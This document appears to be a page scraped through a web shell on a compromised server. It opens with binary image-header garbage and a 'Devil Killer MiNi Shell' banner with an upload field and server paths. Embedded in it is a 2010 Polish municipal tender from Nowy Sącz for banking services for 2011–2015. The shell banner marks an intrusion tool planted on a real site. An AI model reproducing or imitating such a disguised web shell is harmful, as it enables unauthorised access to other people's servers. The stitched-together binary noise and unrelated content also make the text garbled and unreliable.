JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100816/221503-N-2010.html

<p class="kh_header"><b>Nowy Sącz: Obsługa bankowa budżetu Miasta Nowego Sącza na lata 2011-2015.</b><br>
<b>Numer ogłoszenia: 221503 - 2010; data zamieszczenia: 16.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Nowy Sącz , Rynek 1, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4444368, faks 018 443-78-63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowysacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa bankowa budżetu Miasta Nowego Sącza na lata 2011-2015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II.1.3)1) Przedmiotem zamówienia jest obsługa bankowa budżetu miasta Nowego Sącza na lata 2011 - 2015.
II.1.3)2) Obsługa bankowa budżetu obejmuje około 42 rachunki, w tym:
1. Rachunek podstawowy Gminy
2. Rachunek z tytułu podatków i opłat lokalnych
3. Rachunek dochodów pozostałych, wpłaty z tyt.: opłat komunik., mandatów kredytowych, dzierżaw, czynszów, wieczystego użytkowania, wykupu nieruchomości, opłaty eksploatacyjne, opłaty za obrót alkoholem, opłata za wpis do ewidencji dz. gosp., opłaty dotyczące pozostałych dochodów z majątku gminy
4. Rachunek dochodów dotyczący wpłat z tyt. czynszów z lokali stanowiących własność gminy Nowy Sącz, wpłaty czynszów od zarządców budynków komunalnych
5. Rachunek wydatków budżetowych finansowanych ze środków własnych budżetu miasta, dotacje z Gminy na finansowanie wydatków, przelewy i wypłaty gotówkowe dotyczące realizacji wydatków
6. Rachunek wydatków budżetowych finansowanych z dotacji celowych z Budżetu Państwa: dotacje celowe z gminy na realizacje wydatków, przelewy i wypłaty gotówkowe dotyczące wydatków
7. Rachunek kaucji gwarancyjnych
8. Rachunek - zabezpieczenie prawidłowego wykonania robót
9. Dochody Budżetu Państwa (wpłaty z tyt. dochodów z majątku Skarbu państwa: wieczyste użytkowanie, czynsze, dzierżawy oraz opłaty za dowody osobiste)
10. PFRON
11. Sumy obce - wadia
12. Fundusz Świadczeń Socjalnych
13. Fundusz Gospodarki Zasobami Geodezyjnymi i Kartograficznymi
14. Wydatki nie wygasające z upływem roku budżetowego
15. Opłata ewidencyjna wg przepisów Prawo o ruchu drogowym
16. Obsługa programu celowego PFRON pn.: Wyrównywanie różnic między regionami
17. Biuro Rzeczy Znalezionych
18. Twoja AKTYWNOŚĆ szansa na sukces
19. Program wyrównania różnic między regionami - wniosek (PFRON)
20. Przebudowa, modernizacja i rozwój infrastruktury MOK w Nowym Sączu
21. Młodociani
22. Razem Zasmakujmy Europy
23. Rewaloryzacja zabytkowego układu przestrzennego nowosądeckiej Starówki - ulic Jagiellońska - Szwedzka - Wałowa
24. Comenius - ZSO Nr 1
25. Profesjonalista na rynku gastronomicznym
26. Kierunek  na przyszłość - lepsza jakość kształcenia uczniów sądeckich szkół zawodowych w branży budowlanej
27. Aktywna edukacja - szansa na rozwój szkolnictwa zawodowego
28. Obsługa projektu Nowosądeckie Romki zdobywają zawód
29. Obsługa projektu Informatyk - zawód przyszłości
30. SUPer Urząd
31. Rozwiń skrzydła po sądecku
32. Przebudowa i modernizacja historycznych placówek oświatowych na Starym Mieście w Nowym Sączu jako spójna oferta edukacyjna dla dzieci i młodzieży
33. Przedsiębiorczość bez granic
34. Przebudowa ul. Królowej Jadwigi w Nowym Sączu wraz z budową kanalizacji deszczowej (ciąg drogi krajowej nr 87)-zaliczka
35. Przebudowa ul. Królowej Jadwigi w Nowym Sączu wraz z budową kanalizacji deszczowej (ciąg drogi krajowej nr 87)-refundacja
36. Specjalizacja w zawodzie gastronomicznym szansa na sukces rynku
37. Małopolski System Informacji Turystycznej
38. Informatyk-zawód przyszłości-dochodowy
39. Kierunek  na przyszłość - lepsza jakość kształcenia uczniów sądeckich szkół zawodowych w branży budowlanej-dochodowy
40. Profesjonalista na rynku gastronomicznym-dochodowy
41. Polska i Norwegia: bitwa o Narwik 1940-II wojna światowa
42. Budowa nowej siedziby Zespołu Placówek Opiekuńczo-Wychowawczych w Nowym Sączu
II.1.3)3) Ilość rachunków ma charakter przykładowy, występuje stała tendencja wzrostowa.
II.1.3)4) Ponadto przedmiot zamówienia obejmuje obsługę bankową wszystkich jednostek budżetowych i zakładów budżetowych wchodzących w skład budżetu miasta. Jest to łącznie około 65 placówek. Będą one zobowiązane do zawarcia dodatkowo indywidualnych umów lub innych równoważnych porozumień z Bankiem na tych samych zasadach co umowa główna. Zakres obsługi bankowej wymienionych jednostek dotyczy wyłącznie obsługi kasowej bez zaciągania kredytów 
i zobowiązań.
II.1.3)5) W ramach obsługi bankowej wykonawca powinien zapewnić w szczególności:
1. prowadzenie rachunków złotowych i walutowych bezpłatnie
2. likwidację i otwarcie dowolnej liczby nowych rachunków bankowych złotowych 
i walutowych bezpłatnie w krótkim czasie
3. możliwość korzystania z usługi bankowości elektronicznej w Urzędzie Miasta oraz w podległych jednostkach budżetowych
4. dokonywanie przelewów w obrębie banku bez opłat
5. możliwość realizacji przelewów elektronicznych do godziny 15.00, w ilości średnio 500 przelewów dziennie
6. możliwość realizacji przelewów elektronicznych do Urzędów Skarbowych
7. możliwość realizacji przelewów elektronicznych z poszczególnych rachunków bankowych bez dziennego limitu
8. możliwość wczytania pakietu przelewów z pliku wyeksportowanego z systemu księgowego Zamawiającego do aplikacji bankowości elektronicznej
9. dostęp on-line do stanu rachunków bankowych
10. sporządzanie historii rachunków bankowych
11. możliwość zaciągnięcia kredytu w rachunku bieżącym z terminem spłaty do 31.12 każdego roku do kwoty corocznie określonej w Uchwale Budżetowej, obecnie 12 mln zł
12. realizowanie czeków bezgotówkowych i czeków rozrachunkowych
13. realizowanie wypłat gotówkowych zarówno w PLN jak i w walutach obcych na żądanie bez konieczności zgłaszania potrzeb ze znacznym wyprzedzeniem, oraz w nominałach wymaganych przez wypłacającego (np. bilon i banknoty w niskich nominałach)
14. gotowość doradztwa finansowego
15. generowanie autoryzowanych wyciągów bankowych z systemu bankowości elektronicznej, które muszą być czytelne i przejrzyste i zawierać: sumę obrotów operacji dziennych z danego dnia, saldo początkowe i końcowe, opis operacji zawierający dane zapewniające identyfikację wpłaty i wpłacającego,  takie jak numer pokwitowania, imię i nazwisko oraz adres wpłacającego, tytuł wpłaty, kwota, data obciążenia rachunku wpłacającego. Pole tytułem musi zawierać pełną treść, którą podał wpłacający. Wyciąg musi zawierać datę dokonania operacji na rachunku bankowym oraz datę wygenerowania dokumentu. Numeracja stron wyciągu powinna zawierać numer kolejnej strony oraz ilość wszystkich stron wyciągu.
16. sporządzanie potwierdzenia wyciągów bankowych za dowolny okres
17. lokowanie wolnych środków pieniężnych z rachunku bieżącego na lokaty nocne i weekendowe (overnight) bez oddzielnych dyspozycji Zamawiającego
18. lokowanie wolnych środków pieniężnych na lokaty terminowe (inne niż overnight) na podstawie odrębnie zawartych umów
19. uznanie w dowolnym dniu rachunku dochodów Urzędu Miasta wskazanego przez Zamawiającego kwotą naliczonych odsetek od wybranych rachunków
20. odsetki od kredytu w rachunku bieżącym będą obciążać rachunek wydatkowy Urzędu Miasta wskazany przez Zamawiającego
21. kontakt telefoniczny dla wszystkich jednostek z wybraną osobą (pracownikiem banku) od poniedziałku do piątku w godzinach 8.00 - 17.00 w sprawie obsługi, reklamacji i konsultacji oraz podjęcie interwencji najpóźniej do 2 dni roboczych.
22. obsługę bankową przy udziale placówki banku położonej na terenie Nowego Sącza przez wyznaczonego pracownika banku. 
23. wydanie i obsługa max. 4 służbowych kart płatniczych debetowych do wskazanego przez Zamawiającego rachunku. Miesięczny limit wypłaty gotówki oraz miesięczny limit operacji płatniczych zostanie określony w odrębnej umowie o wydanie i użytkowanie karty. Karty powinny być akceptowane na całym świecie i wydane na okres 48 miesięcy. Operacje dokonane kartą będą obciążać rachunek pomocniczy wskazany przez Zamawiającego. Transakcje bezgotówkowe w kraju i zagranicą dokonane kartą, wypłaty z własnych bankomatów Banku, jak również zastrzeżenie karty zgubionej lub skradzionej będą bezpłatne. Pozostałe opłaty związane z obsługą karty będą pobierane przez Bank zgodnie z zapisami zawartej umowy. 
24. sporządzanie przez bank na żądanie Zamawiającego pisemnego zaświadczenia o wpływie na rachunek bankowy określonej kwoty wadium przetargowego z podaniem daty, godziny i minuty wpływu (przewiduje się ok. 5 tego typu zaświadczeń rocznie)
25. prowizje od przelewów z rachunku Zakładowego Funduszu Świadczeń Socjalnych będą obciążać inny rachunek wskazany przez Zamawiającego.
26. możliwość bezpłatnej zamiany kwoty do wysokości 2 000 zł na mniejsze nominały, codziennie po wcześniejszym uzgodnieniu telefonicznym.
II.1.3)6) W ramach obsługi bankowej budżetu wykonawca powinien zapewnić bezpłatne:
1. prowadzenie rachunków złotowych i walutowych
2. otwieranie i likwidację rachunków
3. przelewy między rachunkami w obrębie Banku Zamawiającego
Pozostałe opłaty będą pobierane przez Bank zgodnie z zapisami zawartej umowy, a ich wysokość będzie stanowiła kryterium wyboru najkorzystniejszej oferty.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełniania warunku, o którym mowa w art. 22 ust. 1 pkt 1) ustawy Prawo zamówień publicznych, zamawiający wymaga przedłożenia koncesji, zezwolenia lub licencji zgodnie z obowiązującymi przepisami, tj. ustawą z dnia 29 sierpnia 1997 r. Prawo bankowe (tekst jedn., Dz. U. z 2002, nr 72, poz. 665 z późn. zm.), zwaną dalej Prawem bankowym
III.3.1)1)a)	w przypadku banków państwowych - właściwy akt prawa, o którym mowa w art. 14 ustawy Prawo bankowe 
III.3.1)1)b)	w przypadku banków spółdzielczych - zezwolenia regulowanego art. 20, art. 30a i art. 36 Prawa bankowego
III.3.1)1)c)	w przypadku banków w formie spółki akcyjnej - zezwolenia regulowanego art. 21, art. 30a i art. 36 Prawa bankowego
III.3.1)1)d)	w przypadku oddziałów banków zagranicznych - zezwolenia regulowanego art. 36 i art. 40 Prawa bankowego
III.3.1)2) Ocena spełniania tego warunku udziału w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>III.3.2)1) W zakresie wykazania spełniania warunku wiedzy i doświadczenia, zamawiający będzie rozpatrywał oferty Wykonawców, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują należycie przynajmniej jedną usługę polegającą na obsłudze bankowej jednostki samorządu terytorialnego. 
III.3.2)2) Ocena spełniania tego warunku udziału w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>III.6)1) OŚWIADCZENIE o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy,
III.6)2) Pisemne zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, w przypadku jeżeli Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b) ustawy Pzp (jeżeli dotyczy).
III.6)3) W przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia każdy z wykonawców winien potwierdzić spełnianie warunku udziału                    w postępowaniu, o którym mowa w art. 22 ust. 1 pkt 1 ustawy, a także wykazać brak podstaw do wykluczenia, składając indywidualnie oświadczenia  i dokumenty wskazane w pkt III.3.1), III.4)2), III.6.1) 
III.6)4) Oświadczenia, o których mowa w pkt III.4)2) oraz III.6)1) należy przedstawić w formie oryginału.
III.6)5) Dokumenty, o których mowa w pkt III.4)2), należy przedstawić w formie oryginału lub kserokopii poświadczonej (każda zapisana strona) za zgodność z oryginałem przez Wykonawcę:
III.6)5)a) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, polegających na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczone za zgodność z oryginałem przez Wykonawcę lub te podmioty;
III.6)5)b) zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości;
III.6)5)c) dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
III.6)6) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa pkt III.4)2) składa odpowiedni dokument lub dokumenty - stosownie do postanowień § 4 Rozporządzenia Prezesa Rady Ministrów z dnia 30.12.2009 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. nr 226, poz. 1817).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 8.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>IV.1.2)1)a)	Do składania ofert zostaną zaproszeni Wykonawcy, którzy spełnią warunki określone przez Zamawiającego w pkt III.3. niniejszego ogłoszenia. 
IV.1.2)1)b)	Liczba Wykonawców, którzy zostaną zaproszeni do składania ofert: 
Przewidywana minimalna liczba: 5. Maksymalna liczba: 8
IV.1.2)1)c)	Jeżeli więcej niż 8 Wykonawców spełni warunki udziału w postępowaniu, wówczas do składania ofert zostanie zaproszonych 8 Wykonawców, którzy uzyskają największą ilość punktów według kryterium: największe doświadczenie 100 %.
IV.1.2)1)d)	Minimalna liczba usług, o których mowa w pkt III.3.2)1) niniejszego ogłoszenia wynosi: 1 - 1 pkt.
IV.1.2)1)e)	za każdą następną wykazaną usługę, o której mowa w pkt III.3.2)1) niniejszego ogłoszenia Wykonawca otrzyma 1 pkt.
III.2)2)4)f)	znaczenie warunku/waga kryterium: 100 %.
III.2)2)4)g)	Wykonawca, który wykaże się największym doświadczeniem tzn. wykonał lub wykonuje z należytą starannością w ciągu 3 ostatnich lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, największą liczbę usług polegających na obsłudze bankowej jednostki samorządu terytorialnego - otrzyma maksymalną ilość punktów (100,00).
III.2)2)4)h)	Pozostali wykonawcy otrzymają ilość punktów odpowiadających stosunkowi: liczby obsługiwanych jednostek samorządu terytorialnego wykazanych we wniosku wykonawcy do liczby obsługiwanych jednostek samorządu terytorialnego wykazanych we wniosku wykonawcy wg następującej formuły: Wskaźnik doświadczenia = [liczba obsługiwanych jednostek samorządu terytorialnego wykazanych we wniosku badanego wykonawcy / największa liczba obsługiwanych jednostek samorządu terytorialnego wykazanych we wniosku] x 100,00.
III.2)2)4)i)	Zamawiający uzna, że wykazana usługa została należycie wykonana lub jest należycie wykonywana, jeżeli wykonawca załączy dokument potwierdzający jej należyte wykonanie lub wykonywanie.
III.2)2)4)j)	Zamawiający dokona obliczenia punktacji z dokładnością do dwóch miejsc po przecinku.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.55</li>
<li>2 - Marża dla oprocentowania lokat terminowych overnight - 0.05</li>
<li>3 - Marża dla oprocentowania kredytu w rachunku bieżącym - 0.30</li>
<li>4 - Marża dla oprocentowania wolnych środków w ramach rachunku bankowego - 0.10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.08.2010 godzina 11:30, miejsce: Urząd Miasta Nowego Sącza, ul. Rynek 1, 33-300 Nowy Sącz, pok. nr 9 Biuro Obsługi Mieszkańców..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> IV.4.4)1) Opis sposobu przygotowania wniosku o dopuszczenie do udziału w przetargu, zwanego dalej wnioskiem
IV.4.4)1)a)	Wykonawca może złożyć tylko 1 wniosek sam lub jako partner w konsorcjum
IV.4.4)1)b)	Wniosek powinien być sporządzony w jednym egzemplarzu, w języku polskim pismem maszynowym (maszyna do pisania lub edytor tekstu) lub ręcznie, czytelnie lub literami drukowanymi
IV.4.4)1)c)	Wniosek należy sporządzić i złożyć w sposób zapewniający jego integralność i poufność - zaleca się trwałe spięcie (zszycie), zapobiegające możliwości dekompletacji zawartości wniosku, kolejne ponumerowanie stron itp.
IV.4.4)1)d)	Zamawiający zaleca, aby wniosek był złożony w nieprzejrzystej, zamkniętej kopercie (opakowaniu), która będzie zaadresowana do zamawiającego i będzie posiadać oznaczenie: Wniosek o dopuszczenie do przetargu na: Obsługę bankową budżetu Miasta Nowego Sącza na lata 2011-2015. Nie otwierać do dnia 26.08.2010 do godz. 12:00.
